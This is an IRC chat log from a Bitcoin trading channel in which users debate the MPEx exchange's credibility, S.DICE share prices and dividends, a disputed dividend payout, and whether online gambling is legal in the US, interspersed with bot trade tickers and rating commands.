0.00066181 = 2.2171 BTC [+] Jan 16 23:17:26 actually building it, just because you know linux and stuff, is silly Jan 16 23:17:39 mircea_popescu, is mpex your site? Jan 16 23:17:40 i think rg was living off of it Jan 16 23:17:46 nyRednek yes. hence MP Ex Jan 16 23:18:37 mircea_popescu, you might want to get someone with web design experience on staff...it's not exactly navigable or pleasing to the eye Jan 16 23:18:52 i think you're a little late to that party. Jan 16 23:18:53 lol Jan 16 23:18:56 definitely css Jan 16 23:19:29 ROR Jan 16 23:19:44 mircea_popescu, this is my first day seeing it Jan 16 23:20:08 i can appreicate that. but it's been in business for a while you realise. Jan 16 23:20:30 mircea_popescu, i still recommend you pay someone to make it useable Jan 16 23:20:58 problem is, this is my first day seeing you. why does your recommendation carry weight with me ? Jan 16 23:21:36 nyRednek: nice webinterface and broker for mpex: https://coinbr.com/ref?c=P55Hgmfdv2 Jan 16 23:21:56 because i'm a potential customer, maybe? because i'm not going to spend a dime buying stocks on a site that looks like it was thrown together in one's sleep? Jan 16 23:22:22 i think the brokerage avenue solves the issue of ui nicely Jan 16 23:22:54 jcpham, hence the problem...that brokerage shouldn't be needed for a professional-looking site Jan 16 23:22:54 nyRednek are you trying to resolve a problem of credibility or a problem of usability ? Jan 16 23:23:05 not necessarily Jan 16 23:23:10 mircea_popescu, a bit of both Jan 16 23:23:14 the exchange can operate however it likes Jan 16 23:23:23 it is up to you play by the rules of the exchange Jan 16 23:23:27 [MPEX] [S.DICE] 1939 @ 0.00526607 = 10.2109 BTC [+] Jan 16 23:23:27 not the other way around Jan 16 23:23:34 voteban EskimoBob tbh Jan 16 23:23:39 the brokerage can cater to you Jan 16 23:23:40 usability implies credibility Jan 16 23:23:40 0% signal Jan 16 23:23:46 FML Jan 16 23:23:55 Still haven't got all the shares back I dumped Jan 16 23:24:01 now we are at 526 Jan 16 23:24:25 ;;ticker Jan 16 23:24:25 BTCUSD ticker | Best bid: 14.65000, Best ask: 14.71899, Bid-ask spread: 0.06899, Last trade: 14.73000, 24 hour volume: 39680.96425134, 24 hour low: 14.21001, 24 hour high: 14.73000, 24 hour vwap: 14.45482 Jan 16 23:24:45 don't get me wrong i'd like a pretty mpex Jan 16 23:24:50 nyRednek well, maybe you should treat them separately. for what it's worth, what you call "pleasing to the eye" is, both for good theoretical reasons and proven through practice on record, a sign of poor credibility. Jan 16 23:24:53 TEAR DOWN THIS WALL Jan 16 23:24:53 but it is not a requirement by any means Jan 16 23:25:08 jesus, next stop 75 for sdice ?! Jan 16 23:25:31 this is like, s.mpoe sort of performance wtf. UNFAIR COMPETITION Jan 16 23:25:37 or just dump any securities i have that may be anyway linked with that exchange, considering that the site looks like it's run as a scam Jan 16 23:25:37 he actually pays dividends >< Jan 16 23:25:57 [MPEX] [S.DICE] 1150 @ 0.00509371 = 5.8578 BTC [-] Jan 16 23:26:02 nyRednek i see your point Jan 16 23:26:05 nyRednek the site that "looks like it's run like a scam" is older than most btc scams. Jan 16 23:26:07 including bitcoinica. Jan 16 23:26:17 time is the only indicator i have as a metric for scams Jan 16 23:26:38 mpex is doing good on the time metric Jan 16 23:26:56 jcpham, how long has it been around? Jan 16 23:27:10 more than a year? Jan 16 23:27:10 nyRednek: considering the ease of throwing up a wordpress/bootstrap/lameCMSoftheweek its pretty hard to spot a scam on website appearance Jan 16 23:27:15 i lose track Jan 16 23:27:24 dub, that is true Jan 16 23:27:27 the options page has been trading since august 2011. the exchange was beta'd in februyary 2012 Jan 16 23:27:40 so closer to 18 months now Jan 16 23:27:59 did i just get called a shill Jan 16 23:28:04 [MPEX] [S.BBET] 14000 @ 0.00150005 = 21.0007 BTC [-] Jan 16 23:28:14 EskimoBob, i actually trust jcpham's opinion, considering his activity in OTC Jan 16 23:28:17 who the fuck is @ in this channel Jan 16 23:28:20 don't shills generally get paid, hint hint mircea_popescu Jan 16 23:28:31 jcpham kakobrekla. but srsly, what's the point of kicking people ? Jan 16 23:28:40 dub i pay jcpham regularly Jan 16 23:28:44 in pirate bonds. Jan 16 23:28:49 ha Jan 16 23:28:59 i'll be rich i tell you Jan 16 23:29:27 the real truth is that i'm an independent third party in this matter Jan 16 23:29:34 i sit in this channel for a reason though Jan 16 23:29:35 EskimoBob: wipe your chin dear the froth is goign to break your keyboard Jan 16 23:30:07 jcpham, so if i buy stuff, i'll probably go the brokerage route...i can't make heads or tails of the main site Jan 16 23:30:21 the faq used to have instructions Jan 16 23:30:55 i was only remotely interested in mpex for satoshi dice stock Jan 16 23:31:03 nyRednek opening an accounts costs 30btc iirc Jan 16 23:31:22 coinbr is free-ish? Jan 16 23:31:25 ish Jan 16 23:31:26 or am i wrong Jan 16 23:31:32 cheaper Jan 16 23:31:57 but the short story is that i do not believe mircea_popescu to be a scammer Jan 16 23:31:59 in any way Jan 16 23:32:04 for what it is worth Jan 16 23:32:20 he is unlikely to be a scammer Jan 16 23:32:27 but there are of course risks Jan 16 23:32:30 in the game Jan 16 23:32:41 that are unrelated to scamminess Jan 16 23:32:45 jcpham, ish Jan 16 23:32:45 if he is its the longest con in bitcoin Jan 16 23:33:04 i wouldn't go out of my way to make introductions with strangers if i thought he was ripping people off Jan 16 23:33:11 or is BFL older? Jan 16 23:33:14 well Jan 16 23:33:36 most entertaining PR Jan 16 23:33:36 nyRednek: you are welcome on coinbr, the fees are explained right on frontpage (if you care to read, ofc) Jan 16 23:33:44 dub their first product announcement was spring 2012 neh ? Jan 16 23:34:02 delivered by october iirc Jan 16 23:34:06 whatever year Jan 16 23:34:09 so it's not longer then :p Jan 16 23:34:10 when is spring? Jan 16 23:34:17 like march ? i dunno Jan 16 23:34:26 april, may, something like that Jan 16 23:34:37 nyRednek: but now doesn't look like the best time to buy s.dice Jan 16 23:34:39 minirgs took about 6 months to materialize Jan 16 23:34:46 seems like it was 90 days past Jan 16 23:35:03 they delivered like october first units neh ? Jan 16 23:35:07 https://bitcointalk.org/index.php?topic=129544.msg1458442#msg1458442 Jan 16 23:35:16 ^ that guy knows Jan 16 23:35:24 jurov, oh? Jan 16 23:35:26 I want to say there were taking preorders for fpgas in '11 Jan 16 23:35:37 dub were they ? Jan 16 23:35:50 gigavps when did bfl appear ? 2011 or 2012? Jan 16 23:35:53 mybe it was 2011 Jan 16 23:36:16 oct 2011 Jan 16 23:36:24 jurov, stock price is irrelevant to me, btw...i'm looking for divident percentage...and i can't really afford to play with pepsico and ge atm Jan 16 23:36:25 so marginally later. Jan 16 23:36:31 i remember they were 90 days late because i was in #eligius when luke-jr had a dev unit Jan 16 23:36:34 or access to one Jan 16 23:36:46 nyRednek cost basis still matters. if you buy it at 75 you'll get about half what the ipo people got. Jan 16 23:36:50 so he has a point Jan 16 23:36:53 oh crap i highlighted him Jan 16 23:37:06 nyRednek capital appreciation or depreciation is likely to be more than the dividend Jan 16 23:37:13 in this environment Jan 16 23:37:20 historically speaking Jan 16 23:37:29 mircea_popescu, true...i was looking, and it's still 0.3% dividend atm Jan 16 23:37:35 Bugpowder_ course, value investing theory says that doesn't matter if you're liquid Jan 16 23:37:35 which isn't much at all Jan 16 23:37:46 nyRednek per month. it's huge if compared to pepsico Jan 16 23:38:06 mircea_popescu, pepsico paid out 14% this year Jan 16 23:38:11 o it did ? Jan 16 23:38:16 mircea_popescu, yeah Jan 16 23:38:18 hm, haven't been following. my bad. Jan 16 23:38:24 mountain dew, man Jan 16 23:38:25 14% of stock price Jan 16 23:38:42 the kids want the mountain dews Jan 16 23:38:48 EskimoBob: gigavps wasn't behind the mpex "stock" IIRC Jan 16 23:38:57 and ge is paying out 12% Jan 16 23:39:08 much better than bonds are doing atm Jan 16 23:39:15 jcpham: problem? Jan 16 23:39:18 easy money Jan 16 23:39:27 or to quote myself, Jan 16 23:39:29 i knew you'd come if i highlighted you Jan 16 23:39:32 :) Jan 16 23:39:34 On the positive side, dollar denominated securities of all sorts are slated to raise indefinitely, much past the point where a freshly printed thousand dollar bill won’t suffice to pay for one of the two freshly baked loaves of bread in all of Manhattan. Jan 16 23:39:40 Bet volume is track at around 400,000 this month Jan 16 23:39:50 Bugpowder is that up or down from dec ? Jan 16 23:40:18 mircea_popescu, at the same time, those securities are rising faster than inflation Jan 16 23:40:24 EskimoBob: as I understand it, mircea_popescu created a phony stock to resell GLBSE shares, then forfeited those GLBSE shares for some reason at the expense of all the MPEX phony-stock holder Jan 16 23:40:27 ;;calc 400000*.019/100000000/.0048 Jan 16 23:40:27 0.0158333333333 Jan 16 23:40:41 Down a bit Jan 16 23:40:53 Luke-Jr not quite. Jan 16 23:40:59 mircea_popescu: how so? Jan 16 23:41:02 So we are looking at an EV of around 1.6% dividend / month based on current share price Jan 16 23:41:09 and current bet volume Jan 16 23:41:17 i'm just one of the however many people not interested to deal with the newly created contract device. Jan 16 23:41:30 https://bitcointalk.org/index.php?topic=136882.0;topicseen Jan 16 23:41:36 Bugpowder is jan = dec actual growth in the gambling market ? Jan 16 23:41:39 sorry unrelated Jan 16 23:41:40 like in retail ? Jan 16 23:41:48 1 or 2 big whales made up most of the betting volume last month, they haven't been seen seriously betting since the second. Jan 16 23:41:50 There has been some organic growth in a varitey of mini-whales though Jan 16 23:42:01 jcpham: oh god Jan 16 23:42:04 Luke-Jr i can appreciate he has no other way forward, but that still does exactly nothing for me. Jan 16 23:42:44 Bugpowder, so s.dice is yours? Jan 16 23:43:20 no Jan 16 23:43:26 I just follow it closely Jan 16 23:43:29 http://polimedia.us/dtng/c/src/135829127564.gif Jan 16 23:43:31 also unrelated. Jan 16 23:43:32 mircea_popescu: AFAIK you just have to provide gigavps with evidence you're the shareholder in question. Jan 16 23:43:32 or is it. Jan 16 23:43:35 gigavps: ^ right? Jan 16 23:43:42 jcpham: http://gifrific.com/wp-content/uploads/2012/09/Michael-scott-no-god-no.gif Jan 16 23:43:59 Luke-Jr not like this wasn't discussed to the end about two months ago. Jan 16 23:44:09 [MPEX] [S.DICE] 300 @ 0.00521877 = 1.5656 BTC [+] Jan 16 23:44:20 mircea_popescu: whatever, if you claim there's a mistake in what I said, then explain Jan 16 23:44:35 mircea_popescu: the point is you promised dividends from gigavps to people, then went back on it Jan 16 23:44:40 o sweet, mnw is back Jan 16 23:44:50 Luke-Jr the promise was i will distribute anything gigavps sends. Jan 16 23:44:55 he hath not sent anything more than i distributed. Jan 16 23:45:04 i don't care what extra performance he needs, for whatever reason. Jan 16 23:45:54 for that matter, it was clear the bonds won't be "upgrading", either, and this long before the glbse implosion. Jan 16 23:45:54 mircea_popescu: do you seriously expect that to hold up in court? Jan 16 23:46:01 yes, actually. Jan 16 23:46:06 do you know anything about courts ? Jan 16 23:46:18 yes he does Jan 16 23:46:33 mircea_popescu: I know they don't care about technicalities Jan 16 23:46:35 he's been there to get his kids back from CPS and his wife out of the lunatic asylum Jan 16 23:46:53 o you do ?! Jan 16 23:46:56 different courts i guess. Jan 16 23:48:41 lol Jan 16 23:48:49 a court that rules on a technicality is an incompetent court Jan 16 23:48:50 Ukto hey, people got questions, let em ask. Jan 16 23:48:57 hehehe Jan 16 23:49:13 oh, i had no meaning whatsoever in that Jan 16 23:49:18 Luke-Jr yes, well, what your standards for courtly competence are may differ from what the courts actually do. Jan 16 23:49:34 Also, different courts, yes. what country? what level? Jan 16 23:49:37 all law is basically one huge technicality, for that matter. Jan 16 23:49:54 here, a JP court does not follow technicallities. the judges are not lawyers. Jan 16 23:49:55 no Jan 16 23:50:00 they just listen to two sides and make a decision Jan 16 23:50:13 Ukto sounds more like arbitrage. Jan 16 23:50:18 generally for smaller things under 10k Jan 16 23:50:26 its the "community" court basically Jan 16 23:50:43 but seriously, i'm all for it, i don't see why this needs the drama attached. Jan 16 23:50:55 anyone feels they were damaged by me or mpex there's the rota, he can sue Jan 16 23:50:57 what's the problem ? Jan 16 23:51:36 They'd use the legal system over the rota if anyone was going to do this. Jan 16 23:51:37 "I'll rob a bank. If they don't like it, they can sue." Jan 16 23:51:38 right Jan 16 23:51:40 Probably. Jan 16 23:51:43 not sure why.. in what way.. but that made me giggle. Jan 16 23:52:07 Namworld i doubt anyone would use the legal system seeing how there's not enough to pay for a lawyer's initial retainer in dispute. Jan 16 23:52:21 Luke-Jr the claim is at the very most for conversion. Jan 16 23:52:24 there's no robbery involved. Jan 16 23:52:33 conversion is just a civil tort. Jan 16 23:52:57 jcpham, can we /msg for a moment? Jan 16 23:53:06 nyRednek: sounds kinky Jan 16 23:53:33 yes, the low amounts involved is an issue. Jan 16 23:53:57 actually i imagine the reason nobody actually sued with the rota is that nobody has enough shares that they value enough btc to bother. Jan 16 23:54:02 Ukto, not exactly, just a little normative speech Jan 16 23:54:42 of course, things may be changing there, what did you pay gigavps, like .1 per share ? Jan 16 23:55:01 [MPEX] [S.DICE] 1177 @ 0.00525452 = 6.1846 BTC [+] Jan 16 23:55:03 [MPEX] [S.DICE] 973 @ 0.00525471 = 5.1128 BTC [+] Jan 16 23:55:06 .1279 Jan 16 23:55:08 missing payout is around .12 right now Jan 16 23:55:09 yeah Jan 16 23:55:16 I still haven't claimed my shares Jan 16 23:55:30 :-P Jan 16 23:55:30 .1279 * 900 == ~116 Jan 16 23:55:31 yeah. i guess if nobody sues now they might once (if ?) bfl delivers Jan 16 23:55:36 mircea_popescu: just because you can get away with something, doesn't mean you should do it. Jan 16 23:55:39 so far... it's technically still accruing 0.005xxxxx per week. Jan 16 23:55:40 if not then either... then maybe if btc goes super high Jan 16 23:55:42 mircea_popescu: and yes, what you've done is basically stealing. Jan 16 23:55:46 yeah Jan 16 23:56:03 ;;calc 39*.128*14.73 Jan 16 23:56:03 73.53216 Jan 16 23:56:05 Luke-Jr you're obviously entitled to whatever construction you want on the facts. Jan 16 23:56:37 email Jan 16 23:56:38 Luke-Jr, the problem, if this person is in romania, prosecution is going to be nigh impossible Jan 16 23:56:41 dunno if $73 is enough to mail my ID somewhere Jan 16 23:57:00 Coulda paid off jurov for that I guess Jan 16 23:57:13 nyRednek: I am no longer alone... you use nigh also :~D Jan 16 23:57:15 lol Jan 16 23:57:20 Ukto, heh Jan 16 23:58:19 nyRednek prosecution is going to be nigh on impossible for the relatively simple reason that there's not a case. Jan 16 23:58:21 but hey. Jan 16 23:58:28 i think i'm just going to be converting my btc into cash...traditional securities provide better payout and are more...secure Jan 16 23:58:32 [MPEX] [S.DICE] 2300 @ 0.00521877 = 12.0032 BTC [-] Jan 16 23:58:44 well they don't provide a better payout Jan 16 23:58:47 but they are secure Jan 16 23:58:55 just don't keep them with mf global. Jan 16 23:59:09 or w/e. madoff. Jan 16 23:59:15 mircea_popescu, were you to appear in manhattan, the argument whether a case exists would become more interesting Jan 16 23:59:23 Luke-Jr maybe you should sue them. Jan 16 23:59:36 [MPEX] [S.DICE] 297 @ 0.00521877 = 1.55 BTC [-] Jan 16 23:59:38 [MPEX] [S.DICE] 500 @ 0.00525471 = 2.6274 BTC [+] Jan 16 23:59:47 mircea_popescu: Erik would probably end up in jail. Jan 16 23:59:55 nyRednek only if you could convince some ambulance chaser that i'm really rich enough to take your "case" on % Jan 17 00:00:20 in the unwarranted hope i'll settle. which i won't, so that's moot. Jan 17 00:00:40 nyRednek, fiat porfolio performance doesn't look like this, ever. http://i.imgur.com/idoM0.png Jan 17 00:00:55 jesus. Jan 17 00:01:01 you know what ? that looks like a ponzi. Jan 17 00:01:07 mircea_popescu, well, what i just saw described is securities fraud...one wouldn't need to find a serpentine lawyer to deal with such Jan 17 00:01:25 nyRednek i don't think you're at all qualified to discuss the topic. Jan 17 00:01:25 read the contract dude Jan 17 00:01:40 Bugpowder i imagine he can't now, seeing how he wasn't there at the time and prolly doesn't have a copy. Jan 17 00:02:00 I have a copy Jan 17 00:02:06 It says almost nothing Jan 17 00:02:08 someone shoul;d put a copy on pastebin or /we Jan 17 00:02:35 I probably lost more on F.GIGA.ETF then everyone else put together Jan 17 00:02:54 Bugpowder: just because it's in a contract doesn't make it legal Jan 17 00:02:57 http://trilema.com/2013/sbvps-delisting-notice/#footnote_3_45492 << woah, what? Jan 17 00:02:58 Buglouse, ponzi scheme? Jan 17 00:03:01 it's funny, cause actually mpoe/mpex largest loss was the ~4k btc in august Jan 17 00:03:25 [MPEX] [S.DICE] 577 @ 0.00525471 = 3.032 BTC [+] Jan 17 00:03:26 [MPEX] [S.DICE] 250 @ 0.0052977 = 1.3244 BTC [+] Jan 17 00:03:32 smickles what's the q ? Jan 17 00:03:46 nyRednek, just my personal BTC performance chart Jan 17 00:03:58 mostly due to stock price appreciation Jan 17 00:04:02 Buglouse, again, looks like a ponzi started paying Jan 17 00:04:04 missed a few opportunites Jan 17 00:04:11 poor Buglouse. Jan 17 00:04:18 Bugpowder, i mean Jan 17 00:04:20 not ponzi, just supply and demand imbalance Jan 17 00:04:27 which we are seeing RIGHT NOW with S.DICE Jan 17 00:04:32 Bugpowder no, seriously, it looks totally like a ponzi Jan 17 00:04:40 http://live.coinbr.com/?mpsic=S.DICE Jan 17 00:04:58 mircea_popescu, that's what it looked like to me Jan 17 00:05:00 It is unsustainable for sure Jan 17 00:05:11 i think the problem with btc finance is that people have a crazy time curve. Jan 17 00:05:18 nobody wanted to buy at 32 cause o, 10mn stocks. Jan 17 00:05:24 guess it'll take Erik's arrest to crash S.DICE :/ Jan 17 00:05:27 then that sold out, little by little, now they pay 50 ?! 60 ? Jan 17 00:05:29 yeah Jan 17 00:05:41 that is the risk Jan 17 00:05:41 nyRednek it looks the same to me too. it's what it looks like. Jan 17 00:06:04 Luke-Jr pestering erik atm is the single most damaging thing that can happen to bitcoin. Jan 17 00:06:05 Bugpowder: it's more of an inevitable certainty than a risk, really Jan 17 00:06:15 passthru's are removing stock from the market Jan 17 00:06:18 mircea_popescu: no, Erik is damaging to bitcoin Jan 17 00:06:29 Luke-Jr i don't mean the imaginary bitcoin you jack off to. Jan 17 00:06:32 i mean the actual, useful thing. Jan 17 00:06:39 Luke-Jr I wouldn't say inevitable. but definitely possible Jan 17 00:06:59 Bugpowder: he's in New York. running an online gambling site. openly. as he writes anti-government rants. Jan 17 00:07:05 [MPEX] [S.DICE] 300 @ 0.00569016 = 1.707 BTC [+] Jan 17 00:07:06 Bugpowder: how is that NOT inevitable? Jan 17 00:07:09 thought he was in nh Jan 17 00:07:11 WOW Jan 17 00:07:16 Luke-Jr, oh, he's going to prison Jan 17 00:07:23 Luke-Jr, not a question of if, but when Jan 17 00:07:29 its bitcoin Jan 17 00:07:46 what's with you people and prison. Jan 17 00:07:49 really? satoshidice isn't a 'merican company? Jan 17 00:07:56 there's this penitentiary obsession in the us or what Jan 17 00:07:57 mircea_popescu: I'm pretty sure you're the minority anarchist nutcase. Jan 17 00:07:58 why would the operator go to prison? Jan 17 00:07:58 [MPEX] [S.DICE] 1000 @ 0.00569016 = 5.6902 BTC [+] Jan 17 00:07:59 linden dollars are convertible Jan 17 00:08:10 smickles: NY is America… Jan 17 00:08:16 smickles, promoting gambling is a federal offense Jan 17 00:08:17 Luke-Jr that certainty is easy to reach if you stick to people who agree with you. Jan 17 00:08:22 Bugpowder: which is why Linden Labs had to remove all random from Second Life Jan 17 00:08:24 smickles, doesn't matter where the company is based Jan 17 00:08:27 Luke-Jr: but satoshidice is registered in ireland or something like that Jan 17 00:08:39 smickles: I doubt anyone cares. Jan 17 00:08:44 smickles, doesn't matter if the online gambling is legal in jurisdiction that it is based in Jan 17 00:08:51 I love how the price keeps going up during this discussion Jan 17 00:08:52 [MPEX] [S.DICE] 500 @ 0.00569016 = 2.8451 BTC [+] Jan 17 00:09:00 !ticker m s.dice Jan 17 00:09:01 smickles, if an american promotes online gambling in any way, it is a federal offense Jan 17 00:09:01 [MPEX:S.DICE] 1D: 0.00454703 / 0.00477482 / 0.00569016 (1080790 shares, 5,160.58 BTC), 7D: 0.00449034 / 0.0047035 / 0.00569016 (2770063 shares, 13,029.00 BTC), 30D: 0.0014 / 0.0037207 / 0.00569016 (11858048 shares, 44,120.28 BTC) Jan 17 00:09:03 nyRednek do you really think anyone cares what the us thinks about anything ? Jan 17 00:09:15 mircea_popescu, well, american residents should Jan 17 00:09:20 nyRednek: can you point me to that law pleas :) Jan 17 00:09:20 nyRednek: srsly? Jan 17 00:09:27 nyRednek, federal or state? Jan 17 00:09:33 Bugpowder, federal Jan 17 00:09:43 Bugpowder he's confused. there's the using banking for gambling federal thing. Jan 17 00:09:43 The NY dude that got arrested recently was state Jan 17 00:09:47 nyRednek: so like, if I tell people about other not-DDoSing-Bitcoin gambling sites to use instead of SD, I'm in trouble? :o Jan 17 00:10:02 Luke-Jr, maybe Jan 17 00:10:07 Luke-Jr not rly. but you won't go anywhere. the model works like this because it's sound like this. Jan 17 00:10:12 this is what bitcoin exists to do. Jan 17 00:10:22 you coder people, instead of arguing with your implicit boss, should just stfu and go to work Jan 17 00:10:26 a guy was arrested recently who just sold software to gambling sites Jan 17 00:10:27 to make what needs to be done be done. Jan 17 00:10:53 nyRednek that was the most embarrasing botched conspiracy to pervert the course of justice ever Jan 17 00:11:00 it wouldn't surprise me if the das involved end up in jail. Jan 17 00:11:14 law I believe Jan 17 00:11:20 mircea_popescu, it doesn't work that way here Jan 17 00:11:29 no link or code # for the law? Jan 17 00:11:29 NY though Jan 17 00:11:29 nyRednek how would you know how it works there ? Jan 17 00:11:31 inden_Lab_Official:Policy_Regarding_Wagering_in_Second_Life Jan 17 00:11:33 that was state Jan 17 00:11:35 http://wiki.secondlife.com/wiki/Linden_Lab_Official:Policy_Regarding_Wagering_in_Second_Life Jan 17 00:11:35 yeah Jan 17 00:11:37 oops Jan 17 00:12:16 mircea_popescu, i've been on the receiving end of ill-executed criminal justice efforts Jan 17 00:12:21 Bugpowder: FBI basically forced that FWIW Jan 17 00:12:26 eyah, well, that may not give you the best perspective i guess. Jan 17 00:12:37 mircea_popescu, and beat it Jan 17 00:12:51 also, arrested/shut down != illegal Jan 17 00:12:51 not particularly hard a thing to do, but certainly exhilirating in any case. Jan 17 00:13:20 mircea_popescu, any attorney who acts "in good faith" is covered under sovereign immunity Jan 17 00:13:32 if he acts in good faith Jan 17 00:13:35 [MPEX] [S.MPOE] 13900 @ 0.00065568 = 9.114 BTC [-] Jan 17 00:13:36 [MPEX] [S.MPOE] 5200 @ 0.00065423 = 3.402 BTC [-] Jan 17 00:13:42 [MPEX] [S.DICE] 83 @ 0.00569017 = 0.4723 BTC [+] Jan 17 00:13:43 [MPEX] [S.DICE] 200 @ 0.00569016 = 1.138 BTC [-] Jan 17 00:13:45 [MPEX] [S.DICE] 500 @ 0.00539589 = 2.6979 BTC [-] Jan 17 00:13:46 [MPEX] [S.DICE] 217 @ 0.00539588 = 1.1709 BTC [-] Jan 17 00:13:54 DUMP Jan 17 00:13:55 "in good faith" is hard to disprove Jan 17 00:14:00 threatening a honest citizen with unwarranted prosecution if he refuses to break the law will be a tough sell as good faith. Jan 17 00:14:17 and good faith is not always presumed. Jan 17 00:14:23 mircea_popescu, and is generally established by affidavit Jan 17 00:14:53 anyway. that arrest is possibly the worst setback for gambling prosecution in the past year or two. Jan 17 00:15:15 wait. Jan 17 00:15:19 it sold DOWN from 65 ? Jan 17 00:15:31 [MPEX] [S.DICE] 1650 @ 0.00546657 = 9.0198 BTC [+] Jan 17 00:15:39 motherfucker wow. Jan 17 00:15:56 Bugpowder update in the ponzi graph ? lol Jan 17 00:16:05 naw it got fucked up Jan 17 00:16:14 I cornered the market this morning Jan 17 00:16:20 then fatfingered it all away Jan 17 00:16:27 not all Jan 17 00:16:27 yeah, dumping s.dice through my proxy, as well...give it an hour and it'll be a little lower Jan 17 00:16:29 but a lot Jan 17 00:17:09 nyRednek: did you mean 31 USC section 5361ish? Jan 17 00:17:27 smickles, sounds right Jan 17 00:17:27 [MPEX] [S.DICE] 500 @ 0.005807 = 2.9035 BTC [+] Jan 17 00:17:28 [MPEX] [S.DICE] 3100 @ 0.0058077 = 18.0039 BTC [+] Jan 17 00:17:30 [MPEX] [S.DICE] 6400 @ 0.00598999 = 38.3359 BTC [+] Jan 17 00:17:35 o-) Jan 17 00:17:44 http://live.coinbr.com/?mpsic=S.DICE Jan 17 00:17:48 that looks epic, srsly. Jan 17 00:18:28 nyRednek: i'm looking thru it again, but that doesn't make it illegal to promote gambling Jan 17 00:18:28 so does this Jan 17 00:18:29 http://mpex.co/?mpsic=S.DICE Jan 17 00:18:47 Bugpowder remember that 18 dump ? Jan 17 00:18:56 yah Jan 17 00:19:00 man... Jan 17 00:19:04 [MPEX] [S.MPOE] 10750 @ 0.00065423 = 7.033 BTC [-] Jan 17 00:19:53 nyRednek: it makes it illeagal to accept money for online gambling, it seems Jan 17 00:19:57 mircea_popescu: j/w, but why do you care about what contracts say at all? Jan 17 00:20:05 [MPEX] [S.MPOE] 4950 @ 0.00064989 = 3.217 BTC [-] Jan 17 00:20:16 and is the only federal online gambling law i've yet read Jan 17 00:20:22 Luke-Jr http://trilema.com/2012/gpg-contracts/ Jan 17 00:20:31 it's an entire philosophy Jan 17 00:20:34 smickles, current prosecution is going after software vendors who code software used by online gambling sites Jan 17 00:20:43 mircea_popescu: tl;dr Jan 17 00:20:52 well if you tl;dr you won't know. Jan 17 00:20:56 nyRednek: not under that law, i'm sure Jan 17 00:21:00 I'm not curious enough to read that long thing Jan 17 00:21:07 which seems to be focussed on more than just the question Jan 17 00:21:08 no biggy Jan 17 00:21:12 can you help me find the law that those people are breaking? Jan 17 00:21:29 smickles, i'll look, it might actually be in the new york code Jan 17 00:21:34 smickles his generalisation is unwarranted. one particular da's dirty got blown in the open is all. Jan 17 00:21:38 cause it's being prosecuted here in NY Jan 17 00:21:50 yes Jan 17 00:21:54 that is what i said Jan 17 00:21:56 5 minutes ago Jan 17 00:22:07 nyRednek: wait, NY is shutting down an AZ company? Jan 17 00:22:11 wtf? Jan 17 00:22:18 why don't they just keep doing business Jan 17 00:22:36 !ticker m s.dice Jan 17 00:22:37 [MPEX:S.DICE] 1D: 0.00454703 / 0.00478731 / 0.00598999 (1087457 shares, 5,206.00 BTC), 7D: 0.00449034 / 0.00470862 / 0.00598999 (2782713 shares, 13,102.74 BTC), 30D: 0.0014 / 0.00372295 / 0.00598999 (11870698 shares, 44,194.02 BTC) Jan 17 00:22:39 it'd have to be a federal law Jan 17 00:22:41 smickles i presume cause nobody wants to do business with them anymore because nobody's sure if they have or haven't backdoored Jan 17 00:22:41 since when has law been a basis for the justice system anyway? Jan 17 00:23:04 mircea_popescu: the article i just skimmed said that the ny judge 'shut them down' Jan 17 00:23:10 'legally' Jan 17 00:23:13 um ? Jan 17 00:23:16 next you'll tell me there are constitutional rights or something euqlly crazy Jan 17 00:23:39 dub yes, you have the right to free rectal examinations with any airline ticked bought. Jan 17 00:23:47 think of the children. Jan 17 00:23:55 oh they were Jan 17 00:24:28 has anyone noticed the big move today, ie germany taking its gold back from ny ? Jan 17 00:24:50 smickles, i was assuming it was a federal law, as well, due to the interstate nature of the order Jan 17 00:24:59 gold, pff, call me when they take the palladium Jan 17 00:25:16 why ? Jan 17 00:25:26 cheap pirate joke Jan 17 00:25:42 well, gold is worth more than platinum atm, so...yeah Jan 17 00:26:15 [MPEX] [S.MPOE] 11510 @ 0.00066014 = 7.5982 BTC [+] Jan 17 00:26:17 [MPEX] [S.MPOE] 11474 @ 0.00066181 = 7.5936 BTC [+] Jan 17 00:26:24 palladium is the new hotness with the hookers and blow set Jan 17 00:26:50 "I've survived entirely on bitcoin for a whole year. " Jan 17 00:26:52 dude this is getting old. Jan 17 00:26:59 bitcoin scammer runs off with w/e Jan 17 00:27:05 then three, six months later is back Jan 17 00:27:08 nyRednek: http://www.wired.com/images_blogs/threatlevel/2012/12/StuartIndictment_BillofParticulars.pdf Jan 17 00:27:18 "o, sorry, i has no marketable skills other than selling you ppl's bitcoinz. pls to take me back" Jan 17 00:27:21 what the fuck is this shit! Jan 17 00:27:38 its MNW Jan 17 00:27:42 enough said Jan 17 00:27:45 lambert was here recently too Jan 17 00:27:55 sorta smarmy on the forum, giving opinions Jan 17 00:28:16 [MPEX] [S.MPOE] 11934 @ 0.00066181 = 7.898 BTC [+] Jan 17 00:28:18 [MPEX] [S.MPOE] 1533 @ 0.00066182 = 1.0146 BTC [+] Jan 17 00:28:18 in six months muppets a la eskimoblob will be all pleased to interact and exchange opinions and pats on the back Jan 17 00:28:19 [MPEX] [S.MPOE] 933 @ 0.00066525 = 0.6207 BTC [+] Jan 17 00:28:21 ridiculous. Jan 17 00:28:29 PH has been posting around under ppt-pr Jan 17 00:28:36 right. Jan 17 00:28:40 it's like... pfff. Jan 17 00:29:23 nyRednek: so it's ny pen. law 225.10 Jan 17 00:29:29 not federal law Jan 17 00:29:35 That brings me to the final point. I initially intended to teach the community a lesson about trust, I did not expect anyone to really take the bets and thus I did not expect to keep any profits. As the bets grew though, I was tempted with greed and I fell into a trap. Jan 17 00:29:49 smickles, right...looks like that's the search warrant Jan 17 00:29:53 fucking ridiculous narrative. from 1910 onwards, the same soup of the puritan-contrite criminal Jan 17 00:29:56 "o, i fell into a trap" Jan 17 00:30:00 he fell into his mother. Jan 17 00:30:42 he should probably be arrested under ny pen. law 225.10 Jan 17 00:30:52 had to down rate rg Jan 17 00:31:01 after seeing the delisting announcement Jan 17 00:31:05 that's a point Jan 17 00:31:16 MadSweeney makomk malaimo markedathome maximian midnightmagic MiningBuddy- mircea_popescu mod6 Jan 17 00:31:18 ;;eauth mircea_popescu Jan 17 00:31:19 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Jan 17 00:31:28 ;;unrate rg Jan 17 00:31:29 Successfully removed your rating for rg. Jan 17 00:31:35 mircea_popescu: did rg actually release his keys? Jan 17 00:31:42 ;;everify 